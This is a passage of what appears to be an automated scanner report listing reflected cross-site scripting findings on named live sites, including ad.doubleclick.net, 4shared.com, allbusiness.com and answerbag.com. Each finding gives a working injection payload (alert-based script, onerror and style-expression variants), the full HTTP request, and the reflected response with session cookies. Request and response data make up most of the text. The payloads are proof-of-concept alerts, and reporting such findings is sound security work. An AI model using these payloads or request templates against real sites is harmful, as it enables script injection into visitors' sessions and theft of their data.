Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:59:52 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:59:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
RtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-406387893378091220aba"-alert(1)-"6d10011bb3f&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...

6.4. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d09c"-alert(1)-"9ece5572fb6 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=16d09c"-alert(1)-"9ece5572fb6&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:58:24 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:58:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
A7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=16d09c"-alert(1)-"9ece5572fb6&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/free-easy-webex-together.html%3FTrackID%3D1024048");
var fscUrl = url;
var fsc
...[SNIP]...

6.5. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e478"-alert(1)-"cf73551e9d0 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ1e478"-alert(1)-"cf73551e9d0&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:59:10 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:59:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ1e478"-alert(1)-"cf73551e9d0&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

6.6. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de85f"-alert(1)-"20e7d43f519 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lde85f"-alert(1)-"20e7d43f519&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:57:17 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:57:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/1b7/%2a/c%3B235704433%3B0-0%3B0%3B59487875%3B3454-728/90%3B40121456/40139243/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lde85f"-alert(1)-"20e7d43f519&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRl
...[SNIP]...

6.7. http://www.4shared.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f45e'-alert(1)-'47a61c2d0ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3f45e'-alert(1)-'47a61c2d0ed HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico3f45e'-alert(1)-'47a61c2d0ed
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1459F926DDE8BF905A4995BCC43D1519.dc328; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:25:12 GMT
Content-Length: 41850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/favicon.ico3f45e'-alert(1)-'47a61c2d0ed',
remember : false


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

6.8. http://www.4shared.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15164"-alert(1)-"dd8c6187af5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico15164"-alert(1)-"dd8c6187af5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico15164&quot;-alert(1)-&quot;dd8c6187af5
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=61CB2DAE3C41A134AF4364A8D421487B.dc330; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:25:11 GMT
Content-Length: 41151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.ico15164"-alert(1)-"dd8c6187af5";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

6.9. http://www.aboutus.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aboutus.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e07"><script>alert(1)</script>fd9b551f005 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icod2e07"><script>alert(1)</script>fd9b551f005 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aboutus.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.1
ETag: "64d7e41dd2260249cada85edd9738f53"
X-Runtime: 121
Content-Length: 13392
Set-Cookie: logged_in=false; path=/
Set-Cookie: _aboutus_session_key=BAh7BzoPc2Vzc2lvbl9pZCIlMTY5MTgwMTgzNDlmM2ZmZGJkNzIwNmY4ZGRjOTlhNjEiDWFiX2luZGV4aSs%3D--b35a502024b9ad39567b1317c2a187f617c7104f; path=/; expires=Mon, 02-Apr-2012 13:43:11 GMT; HttpOnly
Cache-Control: max-age=0, public
X-Au-Rails-Sha1: 65ba32a
Server: nginx/0.8.54 + Phusion Passenger 3.0.1 (mod_rails/mod_rack)
X-node-id: rogue
Set-Cookie: SERVERID=rogue; path=/


<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="description" content="Favicon.Icod2e07"><Script>Alert(1)</Script>Fd9b551f005 - Learn from the experts and community at AboutUs.org" />
...[SNIP]...

6.10. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e888a"-alert(1)-"bb943823954 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e888a"-alert(1)-"bb943823954 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allbusiness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 The page you requested could not be found.
Date: Sat, 02 Apr 2011 13:38:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=2a30daa2c5964f7e7295;path=/
Set-Cookie: SERVERID=web6;path=/
Set-Cookie: IIA=%2D3;expires=Sun, 03-Apr-2011 13:38:49 GMT;path=/
Set-Cookie: IIA=%2D2;expires=Sun, 03-Apr-2011 13:38:49 GMT;path=/
Set-Cookie: PAGEID=594366435;path=/
Set-Cookie: TS=2011%2D04%2D02%2008%3A38%3A49%2E447;path=/
Set-Cookie: COMPONENTID=0;expires=Mon, 25-Mar-2041 13:38:49 GMT;path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 47445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content
...[SNIP]...
ot found, but...";
       s_ab.prop10 = "3471360";
       s_ab.prop11 = "";
       s_ab.prop12 = "landingpageobject";
       s_ab.prop13 = "AllBusiness.com";
       s_ab.prop14 = "";
       s_ab.prop15 = "www.allbusiness.com/e888a"-alert(1)-"bb943823954";
       s_ab.prop16 = "";
       s_ab.prop17 = "";
       s_ab.prop18 = "";
       s_ab.prop19 = "";
       s_ab.prop20 = "";
       s_ab.prop21 = "";
       s_ab.prop22 = "";
       s_ab.prop23 = "";
       s_ab.prop24 = "";
       s_ab.p
...[SNIP]...

6.11. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c535f"><img%20src%3da%20onerror%3dalert(1)>8e7e657d535 was submitted in the REST URL parameter 1. This input was echoed as c535f"><img src=a onerror=alert(1)>8e7e657d535 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c535f"><img%20src%3da%20onerror%3dalert(1)>8e7e657d535 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allbusiness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 The page you requested could not be found.
Date: Sat, 02 Apr 2011 13:38:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=ac30c795cbb9533a1273;path=/
Set-Cookie: SERVERID=web7;path=/
Set-Cookie: IIA=%2D3;expires=Sun, 03-Apr-2011 13:38:47 GMT;path=/
Set-Cookie: IIA=%2D2;expires=Sun, 03-Apr-2011 13:38:47 GMT;path=/
Set-Cookie: PAGEID=594366418;path=/
Set-Cookie: TS=2011%2D04%2D02%2008%3A38%3A47%2E92;path=/
Set-Cookie: COMPONENTID=0;expires=Mon, 25-Mar-2041 13:38:47 GMT;path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 47481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content
...[SNIP]...
<form method="post" id="formWrapper_1" name="formWrapper_1" action="https://www.allbusiness.com/c535f"><img src=a onerror=alert(1)>8e7e657d535?server=web7&sid=ac30c795cbb9533a1273">
...[SNIP]...

6.12. http://www.allvoices.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5dd6"><script>alert(1)</script>e219c4ca2fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe5dd6"><script>alert(1)</script>e219c4ca2fb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allvoices.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
X-QueryCount: 2
X-Runtime: 17ms
X-QueryRuntime: 0.00090
Cache-Control: no-cache
Set-Cookie: _T_=c2xmzossd34irl5oaei3kdcgc; path=/; expires=Sun, 03 Apr 2011 01:33:36 GMT
Set-Cookie: page_url=http%3A%2F%2Fwww.allvoices.com%2Ffavicon.icoe5dd6%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee219c4ca2fb; path=/
Set-Cookie: masala_session_id=cc123cc7f9309ecd4fb448f3e3eaa04c; path=/
Content-Length: 27741
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<meta property="og:url" content="http://www.allvoices.com/favicon.icoe5dd6"><script>alert(1)</script>e219c4ca2fb"/>
...[SNIP]...

6.13. http://www.answerbag.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.answerbag.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1dcf8'><script>alert(1)</script>60b16937f0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico1dcf8'><script>alert(1)</script>60b16937f0b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.answerbag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:24:23 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=37e025c3a2f50dca596f6e4370459fb4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org
...[SNIP]...
<meta property='og:url' content='http://www.answerbag.com/favicon.ico1dcf8'><script>alert(1)</script>60b16937f0b' />
...[SNIP]...

6.14. http://www.beyond.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beyond.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e5463%20style%3dx%3aexpression(alert(1))%20fd7a74860e was submitted in the REST URL parameter 1. This input was echoed as e5463 style=x:expression(alert(1)) fd7a74860e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.icoe5463%20style%3dx%3aexpression(alert(1))%20fd7a74860e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beyond.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404
Cache-Control: private
Content-Length: 30033
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: PORTAL=PARTNER=Beyond%2Ecom&NEWUSERSITE=&DIDIPLKUP=Y&USERSTATE=TEXAS&HTTPREFERRER=&USERGID=913263227153426286&USERCOUNTRY=US; expires=Sun, 01-Apr-2012 04:00:00 GMT; path=/
Set-Cookie: Visitor=NewSessionID=7A3FD486%2D48A5%2D4EA0%2DB271%2D6C91FED7EA92; path=/
Set-Cookie: ASPSESSIONIDAQTRQBAR=KNFHENGDPLLKNBNCIIEGPDBD; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:03:54 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equ
...[SNIP]...
